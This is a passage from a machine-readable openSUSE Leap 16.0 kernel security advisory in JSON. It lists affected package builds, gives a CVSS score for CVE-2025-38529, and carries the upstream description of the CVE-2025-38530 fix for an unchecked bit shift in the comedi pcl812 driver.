"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "moderate"
}
],
"title": "CVE-2025-38529"
},
{
"cve": "CVE-2025-38530",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38530"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ncomedi: pcl812: Fix bit shift out of bounds\n\nWhen checking for a supported IRQ number, the following test is used:\n\n\tif ((1 \u003c\u003c it-\u003eoptions[1]) \u0026 board-\u003eirq_bits) {\n\nHowever, `it-\u003eoptions[i]` is an unchecked `int` value from userspace, so\nthe shift amount could be negative or out of bounds. Fix the test by\nrequiring `it-\u003eoptions[1]` to be within bounds before proceeding with\nthe original test. Valid `it-\u003eoptions[1]` values that select the IRQ\nwill be in the range [1,15]. The value 0 explicitly disables the use of\ninterrupts.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
